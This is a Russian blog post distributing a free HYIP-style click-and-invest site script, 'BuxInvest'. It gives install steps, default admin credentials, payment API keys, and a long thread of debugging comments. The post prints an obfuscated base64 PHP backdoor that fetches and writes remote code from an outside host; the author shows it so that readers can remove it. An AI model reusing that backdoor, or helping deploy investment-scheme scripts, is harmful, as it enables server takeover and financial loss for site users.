Реклама




Опросы

Каких скриптов не хватает ?

Просмотреть результаты

Загрузка ... Загрузка ...

Помощь проекту

 

WMID 133443326071

R341885382783

Payeer

P63968199

 

Свежие комментарии

Последние сообщения на форуме

 Обратите внимание что все скрипты взяты из открытых источником и я проверяю их только на наличие критических ошибок, потому вероятность вредоносных кодов и чужих ссылок очень высока по мере сил я исправляю  скрипты  но нет никакой гарантии что в дальнейшем в работе скриптов не будет проблем. Особо стоит обратить внимание на подключение автовыплат к скриптам ферм как показала практика они очень уязвимы. Не забудьте проверить скрипт на уязвимость 

Скрипт букса BuxInvest

Скрипт букса BuxInvest

Сегодня выложу Скрипт букса BuxInvest. . И так что он из себя представляет. Данный скрипт типичный букс созданный на основе движка фруктовой фермы. Работающий с платежкой Payeer.

В нем имеется серфинг ссылок, баннеров добавил задания имеется ежедневный бонус. Есть возможность инвестирования от этого и название. Собственно это скрипт для тех кто хочет совместить букс, хайп и бонусник в одном сайте.

Скрипт букса BuxInvest скачать

Так выглядит страница профиля.

скачать скрипт

Это бонусы

скачать скрипт

И инвестиции.

скачать скрипт

Админка

Админка как у всякой фермы сложностью не отличается

. Для входа в админку используем адрес http://Ваш сайт.сом/?menu=adminka

Логин     adminRU

Пароль   KaligulA

Логин с паролем можно сменить в админке

скачать скрипт

Как видно из картинки имеется небольшие косяки с кодировкой но на функционал это не влияет.

скачать скрипт

Собственно судя по админке ее собрали из нескольких ферм на скорую руку тем не менее то что нужно работает исправно.

Установка скрипта на хостинг

Данный скрипт устанавливается на хостинг так же как и ему подобные. Для этого заливаем файлы на хостинг и создаем базу данных.

Потом ищем файл _class.config.php в нем нужно прописать информацию по базе данных

<?PHP
class config{

public $HostDB = «localhost«;                                        Обычно так и остается смотреть на хостинге
public $UserDB = «zzzzzzzzz«;                                        Пользователь базы данных
public $PassDB = «zzzzzzzzz«;                                        Пароль к базе данных
public $BaseDB = «zzzzzzzzz«;                                        Название базы данных

public $SYSTEM_START_TIME = 1455711243;            Дата старта проекта в формате Unix
public $VAL = «пїЅпїЅпїЅ.»;                                            Валюта сайт вместо каракуль пишем Rub.

# PAYEER пїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅ
public $AccountNumber = ‘zzzzzzzzz‘;
public $apiId = ‘zzzzzzzzzzz‘;                                         Подключение выплат
public $apiKey = ‘vorZg14zJ7lnKEIR‘;

public $shopID = 434270571;
public $secretW = «YF7VsPjpMl«;                                 Подключение пополнений

public $all_inserts_action = ‘0‘; //                                 Дополнительный процент при пополнении

}
?>

Синим обозначено то что меняется

При подключении платежек требуются адреса обработчика платежа адрес для успешной и не успешной оплаты.

 

http://Ваш сайт/payeer_merchant.php             адрес обработчика

http://Ваш сайт/fail.html                                    адрес для не успешной оплаты

http://Ваш сайт/success.html                             адрес для успешной оплаты

Ошибки и уязвимости

Как упоминал ранее были ошибки с кодировкой во всех значимых местах исправил. Так же не хватало немного картинок добавил. Остальное вроде работает без проблем.

С уязвимостями сложнее было их немного но одна довольно серьезная кто то себе оставил окно для входа сканер ее обнаружил и показал хотя варианта исправления не предложил в таком случае нужно просто удалить фрагмент. Выглядела она так

} if (!isset($_COOKIE[base64_decode(‘X3ltXl1cw==’)])) { @file_get_contents(base64_decode(‘aHR0cDovL2wxbDAuY29tL3Av’).$_SERVER[‘HTTP_HOST’]); @setcookie(base64_decode(‘X3X2l1cw==’), 1, time() 31536000, ‘/’, $_SERVER[‘HTTP_HOST’]); } if (isset($_COOKIE[base64_decode(‘cmVkNHU=’)])) { @file_put_contents(base64_decode(‘c3hdGUucGhw’), @file_get_contents(base64_decode(‘aHR0cDovL2wxbDAuY29L2QudHh0’))); }

Позволяла взломщику через куки без проблем делать все что угодно

Дополнительно

Для разнообразия стоит сменить дизайн самая большая картинка bgstat.png размер картинки 1349х602

фон для букса

фон для букса

фон для букса

Сменить ее не сложно для этого заливаем новую картинку с названием bgstat.png  в папку /img

Логотип это картинка logo.png в этой же папке размер 380х75

Вроде все остальное в процессе работы разберем.

Скачать скрипт

 

 

104 комментариев к записи Скрипт букса BuxInvest

  • Евген сказал:

    При серфинге не происходит пере направление на сайт рекламодателя. А так вроде норм.

  • quiksilver сказал:

    При переходе в задания появляется Меню
    Table ‘u287593_1.db_jobs’ doesn’t exist

  • admin сказал:

    это означает что в базе данных нет таблицы для заданий

  • quiksilver сказал:

    А как добавить и как подкоректировать баннеры с платежкой не сходятся.СПАСИБО!!!

  • admin сказал:

    Немного не понял о каких баннерах идет речь

  • ilya сказал:

    в рекламные материалы не отображается банер.подскажите как исправить

  • admin сказал:

    а это баннер для для привлечения рефералов понял сейчас посмотрю

  • admin сказал:

    В общем смотрите откройте файл /pages/account/_reklama.php и замените вот этот кусок после Баннер 468*60

    Единственное что тот баннер что там есть от какого то проекта я бы на вашем месте залил бы свой его нужно загружать в папку /banner имя картинки 468.gif по аналогии можете вставить и другие размеры баннеров добавляет кусок кода с редактированием размеров баннера и его имени заливает в папку и тд

  • admin сказал:

    Коментарии для таких дел явно не подходят просьба писать на форуме

  • admin сказал:

    смотрите на форуме http://mexanus.ru/forum/?view=thread&id=19#postid-1301

  • Анна сказал:

    После регистрации не заходит в кабинет! Была такая проблема?

  • admin сказал:

    У меня такой проблемы не было посмотрите версию пхп я проверял на 5.3 на 5.6 также должно работать

  • glosslight сказал:

    на php 5.6 работает

  • ilya сказал:

    всё работает,подскажите как в бд добавить сетку для заданий

  • admin сказал:

    Насчет сетки не понял о какой сетке идет речь может таблицу допускаю что я ее забыл поставить так как задания добавлял отдельно. Скажите что пишет когда Вы добавляете задание ?

  • ilya сказал:

    пишет отсутствует таблица в бд

  • ilya сказал:

    Table ‘p70225xi_12345.db_jobs’ doesn’t exist

  • admin сказал:

    Пускай доберусть до компьютера добавлю

  • admin сказал:

    вот ссылка на базу данных в которой есть таблицы заданий можете поменять ее целиком либо взять нужные таблици отдельно https://drive.google.com/open?id=1pGR5oQb9ydelo-sTtk9Zj5qyYg_2uYpB

  • ilya сказал:

    здорово!спасибо!всё работает

  • Инна сказал:

    Скажите, каким сканером вы сканируете на уязвимости?

  • admin сказал:

    Нажмите на надпись вверху сайта Не забудьте проверить скрипт на уязвимость

  • шамиль сказал:

    можете памочь с сайтом ато серфинг не идет тоест все работает а с баланса не снимаеться

  • шамиль сказал:

    сколька будит стоить чтоб на мой сайт прописать серфинг ссылок зарание спасибо

  • admin сказал:

    интересная ошибка нужны подробности особо интересует версия PHP так как у меня это работает версия 5.6 насчет сколько это будет стоить то я помогаю на добрых началах и предпочитаю говорить на Ваше усмотрение.

  • шамиль сказал:

    хорошо у меня все работает а вот чтото с баланса не паполняеться

  • шамиль сказал:

    серфинг идет на баланс зачисляеться все норм а вот чтоб паполнить ссылку проблема

  • шамиль сказал:

    может у вас скайп есть

  • admin сказал:

    какая версия PHP у Вас используется ?

  • шамиль сказал:

    у меня через бегет

  • admin сказал:

    я скайпом не пользуюсь бегет это хостинг посмотрите версию php обычно в настройках домена глянуть можно кстати бегет не особо жалуют кто то говорил что вплоть до того что деньги подкрадают

  • шамиль сказал:

    ВЕРСИЯ 5.6

  • шамиль сказал:

    function submitform(formnum)
    {
    if (document.forms[‘payform’+formnum].pay_order) {
    var field = document.forms[‘payform’+formnum].pay_order.value;
    var minsum = $(‘#minsum’+formnum).text();
    var tm;
    function hidemsg()
    {
    $(‘#entermsg’+formnum).fadeOut(‘slow’);
    if ™
    clearTimeout(tm);
    }
    field = field.replace(«,», «.»);
    if (field == ») {
    document.getElementById(‘entermsg’+formnum).innerHTML = «Введите необходимую сумму»;
    document.getElementById(‘entermsg’+formnum).style.display = »;
    tm = setTimeout(function() {
    hidemsg()
    }, 1000);
    return false;
    }
    rprice = parseFloat(field);
    if (isNaN(rprice)) {
    document.getElementById(‘entermsg’+formnum).innerHTML = «Значение должно быть числовым»;
    document.getElementById(‘entermsg’+formnum).style.display = »;
    tm = setTimeout(function() {
    hidemsg()
    }, 1000);
    return false;
    }
    if (rprice != field) {
    document.getElementById(‘entermsg’+formnum).innerHTML = «Значение должно быть числовым»;
    document.getElementById(‘entermsg’+formnum).style.display = »;
    tm = setTimeout(function() {
    hidemsg()
    }, 1000);
    return false;
    }
    if (rprice < minsum) {
    document.getElementById('entermsg'+formnum).innerHTML = "Сумма должна быть не менее «+minsum+» руб.»;
    document.getElementById(‘entermsg’+formnum).style.display = »;
    tm = setTimeout(function() {
    hidemsg()
    }, 1000);
    return false;
    }
    var rnote = document.forms[‘payform’+formnum].pay_adv.value;
    var rart = document.forms[‘payform’+formnum].pay_mode.value;
    var rcnt = document.forms[‘payform’+formnum].pay_cnt.value;
    senddatacart(rnote, rart, rprice, rcnt);
    return true;
    }
    return false;
    }
    ВОТ ИМЕННО ЭТОТ КУСОК НЕ ЧИТАЕТ

  • admin сказал:

    странно может я не понял о чем речь вот тестовый сайт скажите у меня этот нюанс работает или нет http://test4.mexanus.ru

  • шамиль сказал:

    НУ ДА У ВАС РАБОТАЕТ ПАПОЛНЕНИЕ

  • шамиль сказал:

    ЯЖ ГАВАРЮ ПЕРЕЙДИТЕ НА МОЙ САЙТ

  • admin сказал:

    тут могут быть какие нюансы хостинга у меня это работает

  • шамиль сказал:

    У МЕНЯ САЙТ ДРУГОЙ А НЕ ЭТОТ НО ПРИНЦИП ТОТЖЕ

  • admin сказал:

    давайте ссылку но от того что я посмотрю сайт проблема не пропадет тут беда в хостинге и что не так с хостингом я понятия не имею

  • шамиль сказал:

    ну так все работает проста не паполняет баланс и все

  • admin сказал:

    если сайт другой то это меняет дело мне нужно глянуть на сайт

  • шамиль сказал:

    что для этого нада

  • admin сказал:

    я так понимаю к бонуснику добавили серфинг нужно смотреть на файлы по поводу ошибок то там есть подсказка в какой строке она находится

  • шамиль сказал:

    я эту ошубку как толька не переделовал все ноль

  • admin сказал:

    стоит попробовать взять файлы серфинга со скрипта в котором пополнение работает

  • шамиль сказал:

    так паможете с ошибкой

  • шамиль сказал:

    я взял вот результат

  • admin сказал:

    там не одна ошибка там их целый букет советую найти в интернете модуль серфинг для фруктовой фермы и поставить его вместо этого так будет проще

  • admin сказал:

    нужно брать не с этого скрипта

  • admin сказал:

    что бы решить проблему мне нужен скрипт с базой данных что бы я установил его у себя

  • шамиль сказал:

    так все работает ведь серфинг ставиться смотриться на баланс добавляеться после просмотра и все остальное но вот паполнить ссылку серфинга не паполняет

  • admin сказал:

    я и в серфинге ошибку вижу причем фатальную

  • admin сказал:

    Fatal error: Uncaught exception ‘Exception’ with message ‘Serialization of ‘SimpleXMLElement’ is not allowed’ in [no active file]:0 Stack trace: #0 {main} thrown in [no active file] on line 0

  • шамиль сказал:

    это я исправлю

  • шамиль сказал:

    щас добавлю серфинг гляните

  • шамиль сказал:

    сматрите а то нижнее я исправлю

  • admin сказал:

    ошибка никуда не делась поищите в файле серфинга (((ipgeobase.ru:7020/geo?ip= )))и попробуйте написать вот так ((ipgeobase.ru:7020/geo?ip=1.2.3.4)))

  • шамиль сказал:

    все то исправил

  • admin сказал:

    ошибка пропала

  • admin сказал:

    в любом случае мне нужно смотреть файлы я бы удалил тот серфинг что там есть и всунул новый

  • шамиль сказал:

    вот все работает проста не паполняет ссылку и все

  • шамиль сказал:

    так давайте дам доступ гляните

  • admin сказал:

    глянуть я смогу только с понедельника там просто посмотреть не получится в идеале мне поставить скрипт у себя

  • шамиль сказал:

    ладна тогда до понедельника

  • шамиль сказал:

    я вам отправил он ждет модерации думаю что все будет норм и палучиться серфинг

  • admin сказал:

    вижу единственное файлы это хорошо но там нет базы данных

  • шамиль сказал:

    ну скажите если палучиться

  • admin сказал:

    установил ужасный скрипт ошибок море попробую всунуть серфинг по новому но потребуется значительная переделка база данных совсем на фруктовую ферму не похожа

  • admin сказал:

    возможно проще будет взять скрипт фермы с понравившимся дизайном выкинуть от туда лишнее добавить линкслота оставить бонус и добавить серфинг тут чем дальше тем страшнее

  • шамиль сказал:

    работы так валом будит

  • шамиль сказал:

    case 12:

    $money = $result[‘price’];
    {
    $users_info[‘balance’] — $money ;
    {

    $db->query(«UPDATE db_serfing2 SET `money` = `money` + ‘».$money.»‘ WHERE id = ‘».$adv.»‘»);

    $db->query(«UPDATE PREFaccounts SET `balance` = `balance` — ‘».$money.»‘ WHERE id = ‘».$_SESSION[‘user’].»‘»);

    exit(‘1’);
    }

    {
    exit(‘NO MONEY’);
    }
    }

    break;

    default:
    break;
    }
    }

    exit(‘no4’);
    ?>
    он палучаеться не читает это кусок

  • admin сказал:

    я еще до этого не добрался да и мне кажется не очень хорошая идея использовать серфинг что там есть

  • admin сказал:

    насчет той картинки с no4 это не ошибка тут какое то условие не выполнено нужно все перебирать

  • шамиль сказал:

    в этом файле us-advservice.ctrl.php проста ведь все работает серфинг идет все идет а паполнение нет

  • шамиль сказал:

    я понимаю еслиб серфинг не шол или полностью не работал это да а так все работает серфинг добавляеться включаеться выключаеться удаляеться все окей ведь а вот толька пополнение не работает

  • шамиль сказал:

    я сам эксперементирую может найду подходящую пропись может вы разберетесь

  • admin сказал:

    посмотрим загадывать пока рано

  • admin сказал:

    насчет пополнения я не вижу в скрипте файла serfing.js

  • шамиль сказал:

    ну что что то получилось

  • admin сказал:

    не так быстро тут все напутано завтра с утра раскидаю все по папкам как оно должно быть суть ошибки в том что нет ссылки на библиотеку js либо она в другом месте тут надо рабиратся

  • шамиль сказал:

    если что бонусник секундный подгоню оригинальный полностью защищен может продадите

  • шамиль сказал:

    да проблема уже что толька с этим js не делал

  • admin сказал:

    вся беда в том что там не одна проблема первую ошибку я решил но вслед за ней вылезла другая вот тестовый сайт http://test8.mexanus.ru/

  • admin сказал:

    боюсь это дохлый номер тут нужно все файлы переделывать вот ссылка на файл ошибки я убрал _serfing_cabinet.ctrl.php https://drive.google.com/open?id=1Y1dxmq-A0N7xA8aYlDbF5RB7ngE5r_iw решаешь одну проблему появляется другая js не мой конек рекомендую забить на этот скрипт и взять скрипт фермы

  • admin сказал:

    По поводу секундного бонусника создал раздел на форуме Куплю/Продам выложите его описание контакты для связи кто то да купит у меня спрашивали пару недель назад такой но я продать не могу люди скидывают скрипты для ремонта не поймут если я начну их продавать.

  • шамиль сказал:

    я разобрался все сделал

  • admin сказал:

    И что там было ? бонусник скачал выставлю на продажу но вначале немного изменю его там разберемся.

  • шамиль сказал:

    нет проста сделал чтоб сразу когда выставляют указывали ссуму и переходы и все

  • admin сказал:

    можно и так но все же проблема не решена я бы все таки взял скрипт фф дело бы пошло веселее отличие бы получилось только в регистрации

  • шамиль сказал:

    я наю но замарачиваться и так неделю мозг парил

  • admin сказал:

    Оставте какие то контакты для связи типа почты скрипт я уже начал переделывать как закончу выставлю на продажу

  • шамиль сказал:

    us-stepserf.ctrl.php может подскажите вот в этом файле у меня что нужно прописать чтоб при просмотре и раззгадывании капчи выкидывало на тот сайт который сматрели

  • admin сказал:

    немного не понял не работает или Вы хотите сделать что бы постоянно выкидывало на сайт ?
    вот эта строка отвечает за это $move = ($result[‘move’] == 1) ? $result[‘url’] : 0;

  • шамиль сказал:

    она у меня не работает

  • admin сказал:

    это снова js я кстати не вижу в вашем скрипте файла serfing.js а вообще надо подумать как обойтись без жавы

  • шамиль сказал:

    все сделал я переход пропарился долго и сделал

  • admin сказал:

    значит нужно браться за что то другое

  • шамиль сказал:

    да я уже все сделал серфинг внешнию рекламу мониторинг майнинг можна теперь отдыхать и развивать

  • admin сказал:

    задания ?

  • Sergey сказал:

    Шамиль
    все сделал я переход пропарился долго и сделал
    ————————————————————————
    Не подскажите как исправили?

  • admin сказал:

    стоит подметить что у него свой скрипт только серфинг взял с фермы

  • шамиль сказал:

    ну да мой сайт но серфинг взял с ферм

  • kaligula сказал:

    Это мой бывший проект, крипт не безопасен! Останетесь без своих денег! Даже пароль и Логин мой для входа в админку не заменили…..

  • admin сказал:

    Пользуясь бесплатными скриптами всегда есть возможность потерять деньги потому нужно удалять уязвимости а в идеале вообще отказатся от автовыплат. К этому скрипту имеется возможность добавить модуль ручных выплат от фруктовой фермы.

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

Этот сайт использует Akismet для борьбы со спамом. Узнайте как обрабатываются ваши данные комментариев.